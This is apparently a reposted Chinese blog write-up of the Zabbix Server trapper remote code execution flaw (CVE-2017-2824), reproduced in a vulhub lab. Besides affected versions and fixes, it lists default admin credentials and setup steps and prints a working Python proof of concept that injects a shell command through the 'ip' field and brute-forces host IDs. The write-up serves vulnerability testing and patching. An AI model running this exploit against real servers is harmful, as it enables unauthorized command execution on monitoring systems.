当前位置:网站首页>Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)
Zabbix Server Trapper远程代码执行漏洞(CVE-2017-2824)
2022-06-10 18:40:00 【51CTO】
漏洞描述
Zabbix Server是拉脱维亚Zabbix SIA公司的一套应用于服务器端的开源的监控系统。该系统可监视各种网络参数,并提供通知机制让系统管理员快速定位、解决存在的各种问题。Zabbix Server 2.4.X版本中的trapper command功能存在远程代码执行漏洞。恶意人员可远程利用该漏洞注入命令,执行代码。
安全等级
- 高危
影响版本
- Zabbix 2.4.7 - 2.4.8r1
修复建议
- 删除Zabbix数据库中的默认脚本条目,数据库操作 SQL为: use zabbix; delete * from scripts;
- 及时安装官方补丁升级
环境搭建
使用vulhub中的漏洞环境进行测试
测试示例
示例一
使用poc进行验证
验证前需要登录到zabbix开启自动注册功能,直接使用poc的话无法验证
访问zabbix登录界面,使用默认账号密码进行登录admin/zabbix
在Configuration-Actions下选择Auto registration,然后Create action

然后设置一个名称,然后选择Operations

选择Add-Add host,选择完成后,点击下方的Add添加后,再点击蓝色的Add,即可创建成功


在该漏洞目录下,提供了该漏洞的利用方法README.md和利用脚本exploit.py

poc如下:
import
sys
import
socket
import
json
import
sys
def
send(
ip,
data):
conn
=
socket.
create_connection((
ip,
10051),
10)
conn.
send(
json.
dumps(
data).
encode())
data
=
conn.
recv(
2048)
conn.
close()
return
data
target
=
sys.
argv[
1]
print(
send(
target, {
"request":
"active checks",
"host":
"vulhub",
"ip":
";touch /tmp/success"}))
for
i
in
range(
10000,
10500):
data
=
send(
target, {
"request":
"command",
"scriptid":
1,
"hostid":
str(
i)})
if
data
and
b'failed'
not
in
data:
print(
'hostid: %d'
%
i)
print(
data)
- 1.
- 2.
- 3.
- 4.
- 5.
- 6.
- 7.
- 8.
- 9.
- 10.
- 11.
- 12.
- 13.
- 14.
- 15.
- 16.
- 17.
- 18.
- 19.
- 20.
- 21.
在poc中的10051为docker中zabbix-server的映射端口
通过docke ps查看映射端口,需根据实际情况更改
目标的ip无需在poc中设置

使用poc进行验证,后面的ip地址为目标ip地址
可能会失败很多次,最后也是通过反复重启镜像后才验证成功的

成功后进入docker的zabbix-server镜像内部
在tmp下找到了创建的success文件

边栏推荐
- Ruixin micro rk1126 platform platform porting libevent cross compiling libevent
- Chapter IV data type (III)
- LeetCode_ Concurrent search set_ Medium_ 399. division evaluation
- 调试的技巧
- Beijing Metro ticketing system
- [vulnhub range] janchow: 1.0.1
- nodejs-基本架构分析-解析引擎目录-插件安装-核心模块
- Longest ascending subsequence (LIS) Logu
- Monotonic stack structure
- 2022.05.25(LC_718_最长重复子数组)
猜你喜欢

Live broadcast preview | deconstruct OLAP! The new multidimensional analysis architecture paradigm is fully open! Apache Doris will bring five big issues!

【web】個人主頁web大作業「課錶」「相册」「留言板」

一文带你了解J.U.C的FutureTask、Fork/Join框架和BlockingQueue

2022.05.29(LC_6079_价格减免)
![[Agency] 10 minutes to master the essential difference between forward agency and reverse agency](/img/67/5f30f36aa60cf605cbc32399a9d9a0.png)
[Agency] 10 minutes to master the essential difference between forward agency and reverse agency

Basic improvement - tree DP supplement

APICloud可视化开发丨一键生成专业级源码

openSSL1.1.1编译错误 Can‘t locate Win32/Console.pm in @INC

基于SSM流量计量云系统的设计与实现.rar(论文+项目源码)

调试的技巧
随机推荐
Openssl1.1.1 VS2013-编译教程
Chapter 6 relational data theory exercise
源码分析及实践测试OpenFeign负载均衡
mysql8.0(新特性小结)
2022.05.24(LC_674_最长连续递增序列)
C (pointer-02)
2022.05.27(LC_647_回文子串)
SQL statement to view the basic table structure and constraint fields, primary codes and foreign codes in the table (simple and effective)
腾讯云数据库TDSQL-大咖论道 | 基础软件的过去、现在、未来
AEC: analysis of echo generation causes and echo cancellation principle
Chapter 161 SQL function year
Upgrade the playing method of snatching singing, integrate the climax clips of genuine music and real-time scoring ability~
c(指针-02)
ESP8266 系统环境搭建
【 Web 】 page d'accueil personnelle 】 Programme d'études 】 albums de photos 】 babillard d'information 】
Monotonic stack structure
LeetCode_并查集_中等_399. 除法求值
libcurl 7.61.0 VS2013 编译教程
Mysql (17 déclencheurs)
Explain the interview questions by holding chestnuts (interview, review and study)